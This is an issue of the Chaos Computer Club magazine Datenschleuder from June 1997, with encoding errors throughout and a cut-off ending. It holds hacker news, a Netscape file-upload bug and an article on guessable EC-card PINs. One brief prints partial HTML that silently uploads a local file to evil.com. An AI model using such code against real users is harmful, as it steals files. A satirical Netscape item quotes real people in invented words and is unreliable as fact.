==============
Page 1/1
==============

Die Datenschleuder
Das wissenschaftliche Fachblatt für Datenreisende
Ein Organ des Chaos Computer Club

Ein Sicherheitsproblem bei ihrer EC-Karte
ist aufgetreten.
Geben Sie die Karte ihrer Bank zurück.
Gehen Sie nicht über Los.
Ziehen sie keine Klage wegen Betrugs und
Vortäuschung einer Straftat ein.

■ Aktenzeichen EC ungelöst
■ Neues von der Kryptofront
■ Internetz endlich verboten

!
M
O

e

t

ISSN 0930-1045
Juni 1997, DM 5,00
Postvertriebsstück C11301F

i
m
t

n
oh

-R
D
C

z

u
e
N

et
J
!

#59

Impressum
Die Datenschleuder Nr. 59
Quartal I, Juni 1997

Herausgeber:
(Abo«s, AdressŠnderungen etc.)
Chaos Computer Club e.V.
Schwenckestrasse 85
D-20255 Hamburg
Tel. 040-401801-0 /Fax. 040-4917689
Mail: ofÞce@ccchh.ccc.de
Redaktion:
(Artikel, Leserbriefe etc.)
Redaktion Datenschleuder
Postfach 642 860
D-10048 Berlin
Tel. 030-28354872/Fax. 030-28354878
(Tel Šndert sich vorr. demnŠchst)
Mail: ds@ccc.de
Druck: St. Pauli Druckerei Hamburg
ViSdP: Andy MŸller-Maguhn
Mitarbeiter dieser Ausgabe:
Andreas, Bishop (bishop@ccc.de),
Andy (andy@ccc.de), Wau Holland
(wau@ccc.de), Tim Pritlove
(tim@ccc.de), Christine Schšnfeld,
Silke, Tobias (tobias@ccc.de),
Zapf Dingbats
Eigentumsvorbehalt:
Diese Zeitschrift ist solange
Eigentum des Absenders, bis sie
dem Gefangenen persšnlich
ausgehŠndigt worden ist. Zur-HabeNahme ist keine persšnliche
AushŠndigung im Sinne des
Vorbehalts. Wird die Zeitschrift dem
Gefangenen nicht ausgehŠndigt, so
ist sie dem Absender mit dem
Grund der NichtaushŠndigung in
Form eines rechtsmittelfŠhigen
Bescheides zurŸckzusenden.
Copyright (C) bei den Autoren
Abdruck fŸr nichtgewerbliche
Zwecke bei Quellenangabe erlaubt.

Adressen
siehe auch http://www.ccc.de & de.org.ccc
Hamburg: Treff jeden Dienstag, 20 Uhr in den ClubrŠumen in der
Schwenckestr. 85 oder im griechischen Restaurant gegenŸber. U-Bahn
Osterstrasse / Tel. (040) 401801-0, Fax (040) 4917689, Mail: ccchh@ccc.de
Berlin: Treff jeden Dienstag ca. 20 Uhr in den ClubrŠumen, Neue
Schšnhauser Str. 20, Vorderhaus ganz oben. S-/U-Alexanderplatz, SHackescher Markt oder U-Weinmeisterstr. Tel. (030) 28354870, Fax (030)
28354878, Mail: cccbln@ccc.de. Briefpost: CCC Berlin, Postfach 642 860,
D-10048 Berlin Chaosradio auf Fritz i.d.R. am letzten Mittwoch im
Monat von 22.00-01.00 Uhr.
Sachsen/Leipzig: Treffen jeden Dienstag ab 19 Uhr im CafŽ Ambiente,
Petersteinweg, NŠhe Neues Rathaus/Hauptpolizeiwache. Veranstaltungen werden p. Mail Ÿber d. Sachsen-Verteiler (Uni-Leipz) angekŸndigt.
Infos f. Neueinsteiger gibt«s von bubble@sachsen.ccc.de /Briefpost:
Virtueller CCC-Sachsen, c/o Frohburger Medienhaus, Leipziger Str. 3,
04654 Frohburg, Tel: (034348)51153, Fax (034348)51024, Mail:
sachsen@ccc.de, http://www.sachsen.ccc.de
Kšln: Ab 1. Juli Treff jeden Dienstag um 19:30 bei Abgang! in der
HŠndelstrasse 19. Telefonischer Kontakt via 0177-2605262.
Mšnchengladbach: Treff: Surfers Paradise, Bahner 19 in Mšnchengladbach vorerst einmal im Monat jeden letzten Freitag, Ab 1. August dann
immer Dienstags um 20 Uhr. Mail: gregor@enconet.de
Bielefeld: FoeBud e.V., Treff jeden Dienstag um 19:30 im Cafe Durst in
der Heeperstr. 64. Monatliche ãPublic DomainÒ Veranstaltung, siehe
Mailbox. Briefpost: Foebud e.V., Marktstr. 18, D-33602 Bielefeld, Fax.
(0521) 61172, Mailbox (0521) 68000 und Telefon-Hotline Mo-Fr 17-19
Uhr (0521) 175254. Mail zentrale@bionic.zerberus.de
LŸbeck: Treff am ersten und dritten Freitag im Monat um 19 Uhr im
ãShortyÕsÒ, Kronsforder Allee 3a. mail: ccc@ews.on-luebeck.de,
http://www.on-lŸbeck.de/bÞscher/ccc.html, Briefpost: CCC-HL c/o
Benno Fischer, Bugenhagenstr. 7, D-23568 LŸbeck. Tel. (0451) 3882220,
Fax. (0451) 3882221
Ulm: Treff jeden Montag um 19 Uhr im Cafe Einstein an der Uni Ulm.
Kontakt: frank.kargl@rz.uni-ulm.de
Stuttgart: Computerunde SŸcrates, Mail norman@delos.stgt.sub.org
Frankfurt/Mainz: kriegen sich noch nicht zusammengerauft. Wird das
bald mal was?!
…sterreich: Engagierte ComputerexpertInnen,
Postfach 168, A-1015 Wien
USA: 2600 siehe http://www.2600.com

Die Datenschleuder
Nummer 59, Juni 1997

Editorial
Wir Diskordier müssen auseinanderhalten...
Liebe Datenschleuder Leser,
das Prinzip der DezentralitŠt und DiskordinitŠt (und leider auch der DiskoordinitŠt ;-)
begleitet diesen Computer Club jetzt schon seit mehr als ein Jahrzehnt. Die Dynamik des
Lebens, gekoppelt mit der Erfrischung der WiedersprŸche und Šhnlichen Zutaten waren
bislang ein mehr oder weniger gutes Rezept das Chaos aufrechtzuerhalten.
Ob wir allerdings mit der wachsenden Relevanz unserer Themen (z.B. diese blšden
Computer & ihre Auswirkungen auf das menschliche Leben) unsere DiskoordinitŠt auch beibehalten sollten, steht momentan mal wieder zur diskordischen Diskussion.
Professionalisierung als Gebot der Stunde? MachtŸbernahme? Forschungszentrum fŸr kybernetische Hebelermittlung? Stiftung fŸr hochbegabte aber sozial extraterristisch orientierte
Jugendliche? Lobbyarbeit? Partei grŸnden? Genossenschaft aller CCC nahen Firmen?
Bundesregierung wegprogrammieren? Internet endlich als Land bei der UN anmelden und
dahin ziehen?
Informationsfreiheit ist leicht gesagt und schwer verwirklicht. Unser Layouter z.B. hat sich
von der letzten Datenschleuder noch nicht erholt und vor Fertigstellung dieser erstmal die
Flucht ergriffen und sich in den Urlaub abgesetzt. Der fŸr Beschreibung derartiger
Sachverhalte zustŠndige Redakteur fŸr die Katastrophenberichterstattung wurde das letzte
mal beim packen seines Wohnmobils gesehen. Und das Resultat von alldem?
Haltet ihr in den HŠnden.
Trotzdem gibt es hoffnungsvolle AnsŠtze, mit dem Chaos bald die Welt zu regieren. Kritiker
behaupten, wir wŸrden das lŠngst tun. Effektivere Ma§nahmen ergreift in diesem Sinne
jedoch eher die Bundesregierung: erlŠ§t ãMultimediaÒ- Gesetze die eigentlich alles unklare
wie z.B. Verantwortlichkeiten regeln sollen, in erster Linie aber deutlich dokumentieren, da§
die Verantwortlichen das Internet gar nicht begriffen haben und in der Konsequenz ein
Riesen-Chaos anrichten. In diesem Sinne gibt es viel zu tun. Lasst uns bloss wegfahrn. Nach
Holland zum Beispiel (siehe Seite 31).
rŠt,
eure Stimme aus dem Chaos

Index
3 - G10 Statistik inofÞziel veršffentlicht
- Europ. IN-provider ham Schnauze voll
4 - Biologische KriegsfŸhrung: USA vs. Kuba
- Masterspy Turned out Schoolboy Hacker
5 - Sex-StraftŠter am Internet-Pranger
- Hackers hit Polish prime minister
- Japan:Hacker replaced weather with Porn
6 - Netscape Security Flaw is a feature
- Netscape Exploit
7 - Netscape privacy problem reduced
- NT Insecurity
8 - Absolution fŸr Ladendiebe
- Pay per view execution?

Die Datenschleuder
Nummer 59, Juni 1997

9 - EC-Karten Unsicherheit
11 - Gutachten von Prof. Pausch zum EC-PIN
21 - Algorithmus zur Generierung der PIN
22 - OVst-Watch: Beobachtungen am T-Netz
23 - Gesetze gegen Code-Knacker geplant
- Bundestag zur Lage der IT-Sicherheit
24 - DES noch nicht tot, stinkt aber schon
- USA: KontrolleinschrŠnkungssimulation
26 - ...It doesn«t change things at all
- PGP darf exportiert werden
- Alert: Senate to vote on...key escrow
27 - RSA/CRT: One strike and you«re out!
28 - SET auch durch
29 - Das Allerletzte...
30 - Termine / HOPE II / HIP«97 / CCC-MV
31 - Bestellfetzen

Kurzmeldungen
Deutschland

1996 soviele Telefone abgehört wie
niemals zuvor
Das Bundeskriminalamt und die Bundesanwaltschaft haben im vergangenen Jahr soviele
Telefone abhšren lassen wie nie zuvor.
Demnach wurden insgesamt 4674 fest
installierte AnschlŸsse mit richterlicher
Genehmigung angezapft.
Das seien 27,5 Prozent mehr als im Vorjahr
gewesen. Auch die Zahl der Ÿberwachten
Funk-Telefone erreichte mit 1929 abgehšrten
MobilanschlŸssen Rekordhšhe. Die
Abhšraktionen kosteten insgesamt weit mehr
als eine Million Mark.
AFP/Bild 15.05.1997

Europa

Internet Provider Takes On Top
European Carriers
One of EuropeÕs leading independent Internet
service providers is to launch anti-trust
actions against the European UnionÕs top
three telecommunications carriers.
EuNet International, a Dutch-based ISP, said
Tuesday it is set to launch a slate of
complaints to the European Commission over
alleged dirty tricks including abuse of
dominant market position and unexplained
delays to services promised to EuNet Ñ by
top EU telecom carriers attempting to protect
their online service business against the independent ISPs.
EuNet International product development
director Johan Helsingius said his company
will Þle complaints to the European
Commission against Deutsche Telekom,

France Telecom and British Telecom. EuNet
has already Þled one complaint last month,
against BelgiumÕs national carrier Belgacom.
Outside the EU, the company has won a case
against Swiss PTT over unfair subsidies to its
own online service, Helsingius said.
ãBelgacom has shown discriminatory practice
toward us on almost everything, including
delaying on deliverables without
explanation,Ò Helsingius said at a European
chief executivesÕ conference organized by the
Wall Street Journal here. ãThereÕs no decision
yet, because the commission is still
investigating the case.Ò
The EC regulates competition in the 15
countries of the European Union. ãBut that
[the complaint against Belgacom] is just a
pilot,Ò Helsingius added. ãWe have a box full
of other complaints against incumbent operators in Germany, the United Kingdom and
France. In Germany, Deutsche Telekom is so
strong in the market that they just dominate.Ò
EuNet International, which runs its own
Internet backbone but needs to interconnect
with local networks, is also unhappy with its
treatment from Dutch operator PTT
Nederland, Helsingius said, but he added:
ãThey are not the worst offendersÒ EC
competition ofÞcials declined to conÞrm
whether the commission will launch a full
investigation over the Belgacom case.
ãWe are doing our duty, and Belgacom knows
us very well,Ò said one senior competition
ofÞcial, who could not be quoted by name.
Complaints against European national
telephone companies by ISPs and by
independent telecom carriers are expected to
increase during the next six months, as the
EU prepares for the liberalization of telecom
markets in January 1998.
But though the European telecom services

Die Datenschleuder
Nummer 59, Juni 1997

Chaos Realitäts Abgleich
market is supposed to be open to competition
by January next year, the EC has yet to work
out how it will treat Net-based services Ñ
such as Internet telephony Ñ which compete
directly with traditional carriers. The EC said
in May it was setting up a special unit to deal
with complaints of anticompetitive behavior in
the run-up to liberalization of the telecom
market.
Peter Chapman, Techwire
06.04.1997
(Johan Helsingius aka Julf
war Ÿber lange Jahre
hinweg der Betreiber von
anon.penet.Þ)

Planet Erde

Biologische Kriegsführung:
Kuba beschuldigt USA
Laut CNN-Web vom 15.5.1997 sehen sich
kubanische Farmer derzeit mit einem
Problem konfrontiert, das sie bislang nur mit
der Lupe erkennen kšnnen: ihre Ernte wird
durch einen winzigen SchŠdling namens
ãThryps palmiÒ bedroht. SŠmtliche Pestizide
haben sich als ineffektiv erwiesen. Das Insekt
hat bereits einen erheblichen Teil der kubanischen GemŸseernte (Kohl, Tomaten,
Gurken, Bohnen) befallen, so da§ massive
Preisanstiege zu erwarten sind, wenn die
Insektenplage anhŠlt.
Die kubanische Regierung wirft den USA biologische KriegsfŸhrung vor. Ein US-Flugzeug
soll den SchŠdling im letzten Oktober Ÿber
Kuba ausgesetzt haben. Washington
dementiert.
Die Meldung war einen halben Tag auf dem CNNServer und verschwand dann...

Die Datenschleuder
Nummer 59, Juni 1997

Internet

Masterspy Turned Out to be
Schoolboy Hacker
LONDON - A masterspy believed by the
Pentagon to be the No. 1threat to U.S.
security and deadlier
than the KGB turned
out to be a British
schoolboy hacker working out of his
bedroom. U.S. military
chiefs feared that an
East European spy
ring had gained access
to their innermost
intelligence secrets
and hacked into
American Air Defense
systems.
But a 13-month investigation and a dramatic
police raid on his London home revealed that
16-year-old music student Richard Pryce was
the culprit. Pryce, known on the internet as
ãThe Datastream Cowboy,Ò was Þned $1,915
Friday by a London court after what his
lawyer called ãa schoolboy prankÒ reminiscent
of the movie ãWar Games.Ò The U.S. Senate
armed services committee was told the
mystery hacker was the number one threat to
U.S. security. He was said to have downloaded
dozens of secret Þles, including details of the
research and development of ballistic missiles.
Up to 200 security breaches were logged.
Using a $1,200 computer and modem, Pryce
hacked into computers at GrifÞss Air Base in
New York and a network in California run by
the missile and aircraft manufacturer
Lockheed. ãThose places were a lot easier to
get into than university computers in
England,Ò Pryce told reporters. ãIt was more
of a challenge really, going somewhere I wasnÕt meant to. If you set out to go somewhere
and you get there, other hackers would be

Kurzmeldungen
impressed,Ò he said. His prank put Pryce on
the front pages of most British newspapers
Saturday with tales of ãThe Schoolboy
masterspyÒ and ãThe Boy who cracked open
the Pentagon.Ò
Pryce, now 19, has been offered sizeable sums
for the book and Þlm rights to his story but
his parents say he prefers to stick to his
double bass and concentrate on winning a
place in a leading London orchestra.
ãQuite remarkably in a society dominated by
sleaze, he has refused all the offers and wants
xto resume his quiet life,Ò said his father,
Nick Robertson. His computer skills were not
reßected in his exam results Ñ he was only
awarded a ÔDÕ grade.
Reuter 22.03.1997

Internet

Sex-Straftäter am Internet-Pranger
Seattle - Sex-StraftŠter stehen im US-Bundesstaat Alaska nach ihrer Haftentlassung am
elektronischen Pranger. Wer wegen
Vergewaltigung, Kindesmi§brauch oder
Verbreitung von Pornographie verurteilt wurde, wird mit Namen und Adresse auf einer
neuen Webseite angegeben. Sie sei ein voller
Erfolg, sagte die Polizei in Anchorage. In den
ersten 24 Stunden seit ihrer Einrichtung sei
sie fast 4000 mal angewŠhlt worden. Wie in
vielen anderen US-Bundesstaaten sollten die
BŸrger durch die Veršffentlichung wissen,
wer in ihrer Mitte wohne.
dpa 13.06.1997

Internet

Hackers hit Polish prime minister’s
website
WARSAW - A hacker broke into the Polish
cabinetÕs internet website over the weekend,

altering its heading to read ãHackpublic of
PolandÒ and ãGovernment Disinformation
Center,Ò a newspaper reported Wednesday.
Internet users seeking information from the
prime ministerÕs ofÞce found themselves
referred to the site of Playboy magazine by
the unknown hacker, who signed him or
herself ãDamage.Inc,Ò the daily Gazeta
Wyborcza said. An ofÞcial in the ofÞce which
produced the government website told
Reuters Wednesday it had been withdrawn
pending the provision of new security
codes.A copy of the altered version could still
be viewed on
http://www.software.com.pl/intdev/news/
welcomep.html, the server of the Net Security
Institute (IBS) in Warsaw. The newspaper
quoted government spokeswoman
Aleksandra Jakubowska as saying that the
cabinet website was not connected to the
governmentÕs internal computer network so
there was no danger of using the internet to
access government secrets.
Reuter 07.05.1997

Internet

Japan police say hacker replaced
weather with porn
TOKYO, (23.05.1997/Reuter) - Japanese
police on Friday arrested a 27-year-old
computer engineer suspected of replacing
public weather charts on the Internet with
pornographic pictures. A spokesman for
Osaka police said Koichi Kubojima, a resident
of the northern Tokyo suburb of Fujimi, was
the Þrst person in Japan to be arrested for
suspected violation of a 1987 anti-hacker law.
Kubojima is accused of taking over seven
web pages of the Osaka-based television
network Asahi Broadcasting Company on
May 18 and replacing Þve of the seven

Die Datenschleuder
Nummer 59, Juni 1997

Chaos Realitäts Abgleich
weather charts on the pages with
pornographic pictures. He also faces charges
under JapanÕs anti-obscenity laws. Police said
Kubojima told investigators he was just
trying to have some fun and tried but failed
to delete the pictures when he learned that
his own actions were being reported all over
on the Internet. He used a fake password
obtained from a local Internet provider to enter the website from his personal computer at
home, but his operations were retraced by
investigators through phone records kept at
the provider Þrm, police said.
If convicted,
Kubojima faces a Þne of one million yen
($8,600) and a prison term of up to Þve years
under tough penalties against hackers
adopted in 1992.
Bugs

Netscape Security Flaw is a feature
Many of us have been watching the CNN
reportsÑheadline reports at thatÑthat all
past and current versions of Netscape on all
platforms have reportedly carried the bug
that allows any Web site being hit by
Netscape to examine Þles on the userÕs hard
disk.
(A demonstration by the Danish team was
compelling. CNN-FN generated a text Þle,
placed it on their hard disk, and accessed the
Danish site. Moments later, the Danes read
back the text Þle. Over and over for more
examples. They _could have been_ the NSA
Web site, and the Þles could have been
history Þles, passphrase Þles, etc. History Þles
are common, and give captured kestrokes, of
course.)
But how could such a massive, massive ßaw
have gone undiscovered for so long?

According to Netscape spokesmen, this
feature was added to the kernel of Mosaic,
then Navigator, in 1993, as part of the Clipper
Key Recovery Program. As James Clarke put
it an interview tonight on MSNBC, ãDorothy
Denning asked us to insert the ãremote readÒ
capabilities to ensure that the legitimate
needs of law enforcement are met. No person
cruising the Web has any expectation of
privacy, as even Declan McCullagh has
pointed out.Ò Marc Rotenberg commented,
ãPrivacy at the individual user level is
unimportant, just so long as a Privacy
Ombudsman can decide on the legitimate
needs of law enforcement.Ò
Meanwhile, Microsoft has acknowledge that
all lines to its Redmond site are clogged by
people dumping Navigator and trying to
download Explorer.
ÑTim May, tcmay@got.net

Netscape Exploit
Here is a sample it isnÕt complete but you get
the basic idea of what is going on
<HTML><HEAD><TITLE>Evil-DOT-COM
Homepage</TITLE><HEAD>
<BODY onLoad=ÒdaForm.submit()Ò>
<FORM>
NAME=ÒdaFormÒ
ACTION=Òhttp://evil.com/cgibin/formmail.plÒ
METHOD=POST
<INPUT TYPE=FILE VALUE=Òc:\conÞg.sysÒ
Name=ÒSave This Document on your
HarddriveÒ
<INPUT TYPE=HIDDEN NAME=ÒrecipientÒ
value=Òfoobar@evil.comÒ
and so on and so forth...

The answer, ãItÕs a feature, not a bug.Ò

Die Datenschleuder
Nummer 59, Juni 1997

Lucky Green <shamrock@netcom.com>

Kurzmeldungen
...Bugs...

Netscape privacy problem reproduced
Using information gleaned from the web site
of the Danish company that Þrst reported the
problem, Keith Woodard and Dave
Humphrey at EIFIST have built a web page
which reproduces the privacy problem in
Netscape Navigator and Communicator web
browsers. From that effort they have
developed a better understanding of how the
Netscape bug works, and what defensive
measures users can take until a bugÞx is available from Netscape. First, the problem is
indeed read-only, and involves only Þles to
which the explicit path name
is known. Second, all Þle
systems accessible from the
Netscape userÕs system are
reachable Ñ that means
mapped network drives as well
as the local hard disk. Third,
JavaScript can be used by a
web site to automate reading a
userÕs Þle so that it is invisible
to the user. However, the bug
does not involve use of Java at
all.
The demo website can be visited at the
following URL:
http://eiÞst.frb.org/hacker/Þleupload.html
Please urge all Internet web users to take the
following interim steps until a permanent Þx
is available from Netscape:
* In Navigator 3.x and 2.x, go to the Options
menu and select Security Preferences. Select
the ãSubmitting a Form InsecurelyÒ preference to enable that warning dialog box. This
will generate a warning box

whenever a site tries to upload a form, giving
the user a chance to decide whether to allow
it.
* Also, in Navigator 3.x and 2.x, go to the
Options menu and select Network
Preferences. Turn OFF the ãEnable
JavaScriptÒ preference. This will block
execution of JavaScript code which might try
to perform an invisible Þle upload, while permitting display of the rest of the page.These
measures are temporary until a full bug Þx is
made available by Netscape and proven
against the EIFIST demo page.
Regards

NT Insecurity
In order to expose the
ßaw and demonstrate
these potential vulne
abilities,NTsecurity.com
created a program tool
called RedButton. When
executed, RedButton
exploits the ßaw and
does the following: - logs
on remotely to a Target
computer without presenting any User Name
and Password- gains access to the resources
published to Everyone - determines the
current name of Built-in Administrator
account (thus demonstrating that it is useless
to rename it) - reads several registry entries
(i.e. it displays the name of Registered
Owner) - lists all shares (including the hidden
ones) RedButton is not an intruderÕs tool, and
it does not increase any security risks or
vulnerability. However, it demonstrates how
a potential intruder can exploit an NT system.
http://www.ntsecurity.com/RedButton/index.htm

Die Datenschleuder
Nummer 59, Juni 1997

Chaos Realitäts Abgleich
Evolution

Absolution für Ladendiebe
SupermŠrkte seien wie KrebsgeschwŸre fŸr
das soziale Leben in den StŠdten, meint der
anglikanische Geistliche
John Papworth. Deshalb
sei Ladendiebstahl
keine SŸnde. Die Kirche
von England reagierte
ebenso ungehalten wie
Supermarktketten und
der britische
Innenminister. Doch
Papworth lŠ§t sich nicht
beirren: Jesus habe zwar NŠchstenliebe gepredigt, er habe aber nicht gesagt: ãDu sollst
Marks und Spencer liebenÒ, sagte der
Geistliche in Anspielung eine britische
Supermarktkette.
Quelle: CriminalDigest 2/97

De-Evolution

Pay per view execution?
In the U.S. Timothy McVeigh might get a pay-per-view
execution prime time In middle ages executions were
popular spectacles: it was a way for powerful (nobles,
kings, church, etc.) to show their power in most
ßagrant way to the peasants and just ordinary plebs. It
was also a way for the public to participate in the
punishment of the perceived evil - whether it was a
real Jeffrey Dahmer like psycho, or a woman accused
for witchcraft. Watching the criminal die for his/hers
crimes or sins works cathartic on people. It also
reinforces the public belief in justice, order and the state. Only later in our development as humans did we
decide that an execution is actually a state sponsored
murder, and no murder is justiÞed under the rule of
God, so, therefore, while many governments did not
dispense off death penalty, they usually restrained
themselves from televising executions and instead showing them just to the close range of relatives of

Die Datenschleuder
Nummer 59, Juni 1997

victims. To make an execution public like in the case
of Tim McVeigh, would be like returning to the 15th
century. Arguably, in the case of Oklahoma City bombing, the victims were random Americans, and by
extension each resident of the U.S. can be considered
their relative,
proponents of the
televised execution
may say. However,
public was never in
the entire history
CHARGED to view
an execution. How
many people would
actually pay to watch
Timothy die? Imagine after a day of hard work, you
relax on your couch, pop up a beer can and order a
nice pay-per-view execution. Watch him die in privacy
and convenience of your own apartment. How much
should it cost? How much would people be willing to
pay? Should the victims and their relatives be paid
royalties - I mean, their suffering brought down the
sentence and the execution, but they did not actively
participate in the business. Will cable companies let
them watch execution for free, or at some discount at
least? Bizarre as it is - introduction of pay-per-view
executions may reduce the backlog on the death row:
now, when there is money to be made, maybe there
will be state licensed lethal injection private
practitioners (Kevorkian, as a person with immense
experience, should apply), and the process of ãdelivering justiceÒ may speed up considerably.
http://www.peacenet.org/balkans/
# Ursprung : /APC/GEN/RADIO
## Ersteller: ivo@reporters.net
PO Box 46, NYC NY 10029, USA

EC-Karten Unsicherheit
Bereits in der Datenschleuder Nummer 53 im
Dezember 1995 wurde der Leser in einem
einen lŠngeren Artikel Ÿber die Verbraucherschutz-Problematik der EC-Karte aufgeklŠrt.
Im Kern besteht das Problem in der sog.
ãSorgfaltspßichtÒ des Kunden zum Umgang
mit dem PIN-Code, welcher zu seiner ECKarte gehšrt.
Der Kunde ist verpßichtet, diesen PIN-Code
niemandem mitzuteilen, ihn nicht zusammen
mit der Karte aufzubewahren, ihn nicht auf
die EC-Karte selbst zu schreiben und so fort.
Wird nun jemand seine EC-Karte z.B. mit seinem kompletten Portemonaie geklaut und es
kommt, bevor er die Karte Ÿber den zentralen
Sperrdienst in Frankfurt sperrt, zu Abhebungen, hat er ein Problem. Konkret muss er
seiner Bank beweisen, da§ er seiner Sorgfaltspßicht nachgekommen ist, also seinem
geklauten Portemonaie kein Zettel mit seinem
PIN-Code beilag. Die Banken argumentierten
bisher mit der Unmšglichkeit, von den Daten
des Magnetstreifens auf den PIN-Code zu
kommen. Sie verdŠchtigen standartmŠssig im
Gegensatz den Kunden, den Diebstahl der
Karte nur vorgetŠuscht zu haben und die
Abhebungen selbst getŠtigt zu haben, bzw.
als MittŠter diese mitgeteilt zu haben.
Auch wenn der Algorithmus und die
Vorgehensweise, wie aus den Kartendaten
der PIN berechnet wird schon lŠnger bekannt
ist, gelang der Beweis der Berechnung bisher
eher nicht und Gerichtsverfahren gingen
entsprechend verbraucherungŸnstig aus.
Lediglich in einem Gerichtsverfahren von
1988 (AZ 36C4386/87) in denen Prof. Dr.
Pausch in einem Gutachten ermittelte, das
der PIN-Code sehr wohl unter bestimmten
Vorraussetzungen ermittelbar war, bekam die
betroffene Kundin recht. In der Datenschleuder 53 versprach ich damals mehr Ÿber das
Gutachten von Pausch und das Urteil in
Erfahrung zu bringen, was aufgrund akuten
Chaos auf anderen Baustellen (CCC«95 und
Folgen) unterblieb. Dies ist insofern im nachhinein wichtig, als das der DS-Artikel in mehreren Gerichtsverfahren als Beweismaterial
eingereicht wurde und die Banken dann mit
Verweis auf den versprochenen aber
fehlenden Folgeartikel mit den Details vom

Pausch-Gutachten seine (!) SerišsitŠt
anzweifelten. Unter dem Motto: ãnicht mal
die haben es geschafft, die Informationen zu
bekommen...Ò.
Diese Details und etliche andere kamen
jedoch erst in den letzten Wochen zum Vorschein, nachdem ein spektakulŠres Gerichtsurteil des OLG Hamm am 17.03.1997
Bewegung in die Sache brachte. Unter dem
Aktenzeichen 31 U 72 / 96 und der - leider
erst Mitte Mai verfŸgbaren UrteilsbegrŸndung (2) - wurde nicht nur auf Oberlandesgerichtsebene in einem nicht-revisionsfŠhigen
Urteil die Ermittelbarkeit aufgrund der
Kartendaten bestŠtigt, sondern auch gleich
die Beweislastfrage auf die fallspeziÞschen
Randhandlungen bezogen. Ausschlaggebend
war wiederum ein Gutachten des Prof. Dr.
Pausch, der allerdings diesmal wesentlich
ausfŸhrlicher die ihm bekannten Mšglichkeiten aufzeigte, wie ein Dieb den PIN-Code
ermitteln kšnne.
Das nachstehend (mit freundlicher Genehmigung von Prof. Dr. Pausch) abgedruckte
Gutachten spricht fŸr sich und bringt
deutliche Beleuchtung in den Sachverhalt.
Die Feststellung, da§ die Mšglichkeit des
Erratens des PIN-Codes mit einer
Wahrscheinlichkeit von 1:150 aufgrund ungleichmŠssiger Verteilung anderer Details
mšglich ist, wurde beim OLG-Hamm sogar
von Herrn Dr. Heuser vom Bundesamt fŸr
Sicherheit in der Informationstechnik (BSI)
bestŠtigt.
Herr Dr. Heuser versprach Ÿbrigens einem
Mitarbeiter der Datenschleuder zwar die
umgehende Zusendung seines Gutachtens,
dies erreichte uns jedoch auch nach 4 Wochen
nicht. Mittlerweile sind von mehreren unabhŠngigen Quellen Hinweise auf die Motive
des BSI aufgetaucht, nach 15 (!) Jahren die
lŠngst bekannte Unsicherheit des ECKartenverfahrens teilweise einzugestehen.
Das BSI, so hei§t es, arbeitet an einer chipkartenbasierten Lšsung fŸr rechtsverbindliche elektronische Unterschriften (AuthentiÞzierung) nach der jŸngst verabschiedeten
Signaturgesetzgebung des MultimediaGesetzes aus dem Hause RŸttgers (BMBF).
WŠre ja auch komisch, wenn sich das

Die Datenschleuder
Nummer 59, Juni 1997

AZ 31 U 72 / 96 und folgen
staatliche BSI sich uneigennŸtzig gegen die
Banken wenden wŸrde...
Doch zurŸck zur Unsicherheit des ECSystems. Die Wahrscheinlichkeitsaussage
beruht auf der Art und Weise der internen
Umrechnung und einer Besonderheit. Die
Besonderheit ist, dass die erste Ziffer der PIN
niemals eine 0 ist, tritt eine 0 im Rechenproze§ als Ergebnis aus wird daraus eine 1
gemacht. Die Art und Weise der Umrechnung
ist die Umwandlung der internen Hex-Werte
(0-9 & A-F) auf Dezimalziffern (0-9): aus ãAFÒ wird wiederum ã0-5Ò nach Modulo 10:
A=0, B=1 etc. - und aus A=0 wird bei der
ersten Ziffer wiederum aus 0 eine 1 weil die 0
per DeÞnition hier nicht erlaubt ist. So treten
an 1. Stelle die Ziffern 0,1,A,B vier mal so
hŠuÞg auf wie andere, die Ziffern 1-5
insgesamt bei den anderen Stellen jedoch
doppelt so hŠuÞg auf wie die anderen. Damit
treten bestimmte PIN«s hŠuÞger auf als andere (Errechnungen dem Leser vorbehalten).
Reaktionen
Die Banken konzentrieren sich in ihrer
Reaktion derweil auf Nebelwerfen und
Mauern - nebst Umstellung auf ein neues
PIN-Verfahren. Das betroffene Institut des
OLG-Hamm Urteils, die Postbank, verweigert z.B. eine eigene Stellungnahme (3) und
verweist auf den Zentralen Kreditausschu§
(ZKA). Dieser wiederum versucht mit
nebulšsen Angaben die UrteilsbegrŸndung
und den Gutachter zu diskreditieren.
So behauptet der ZKA (4) beispielsweise,
ã[...] Viele Karten verfŸgen Ÿber gar keine
gŸltigen Offset-Werte mehr, da diese Werte fŸr
die †berprŸfung der PIN heute nicht mehr
benštigt werden. Der angenommene
Wahrscheinlichkeitswert fŸr ein Erraten der PIN
ist daher nicht zutreffend.Ò. Implizit wird
(aufgrund des Zwecks des Offsets; der Offset
ist der (Zahlen-)wert, der dem Rechenergebnis
des PoolschlŸssels hinzugefŸgt wird, wenn
der InstitutsschlŸssel nicht vorliegt) damit
behauptet, es gŠbe quasi keine ofßinebetriebene GAA mehr, was allerdings
sachlich falsch ist. So sind nicht nur ofßineZeiten von GAA aufgrund der Umbuchung
vom technischen auf den juristischen

Die Datenschleuder
Nummer 59, Juni 1997

Datenbestand bekannt, sondern auch
weiterhin (ofßine) GAA im (europŠischen)
Ausland; auch berichtete Pausch auf der ãa«la
CardÒ Konferenz in Hamburg von einem Fall
von einer westdeutschen Gro§stadt im Mai
1997, wo ein Bagger versehentlich die
Kabelverbindungen eines GAA wegri§ und
dieser trotzdem noch ec-Karten akzeptierte
und bei richtigem PIN Geld ausspuckte.
Bankenvertreter rŠumten auf selbiger
Konferenz in der Diskussion Ÿbrigens ein,
man kšnne ja auch nicht im Ofßine-Fall
einfach die Auszahlung verweigern; man
stelle sich den Kunden im Ausland vor, der
auf einmal kein Bargeld bekommt oder im
Restaurant sein Essen nicht bezahlen kann...
Eine richtige Sachinformation enthŠlt die
ZKA-Stellungnahme dann Ÿbrigens doch
noch: ãDarŸber hinaus werden alle VerfŸgungen
und VerfŸhrungsversuche mit falscher PIN protokolliert, so da§ Angriffe, die auf einem
Ausprobieren von PIN beruhen, nachvollzogen
und eindeutig erkannt werden kšnnen.Ò (die
Frage ist nur wo, wann und durch wen!)
sowie die Folgerung (wenn man sich die
EinschrŠnkung hinzudenkt, dass dies nur
beim online-Betrieb Ÿberhaupt sein kann),
da§ ãAuch eine VerŠnderung des
FehlbedienungszŠhlers auf der Karte fŸhrt daher
nicht zu einer beliebig hohen Zahl von PINVersuchen.Ò.
Ganz zufŠllig, všllig unabhŠngig von diesen
Geschehnissen und in Ÿberhaupt keinem
Zusammenhang stehend (;-) verkŸndet uns
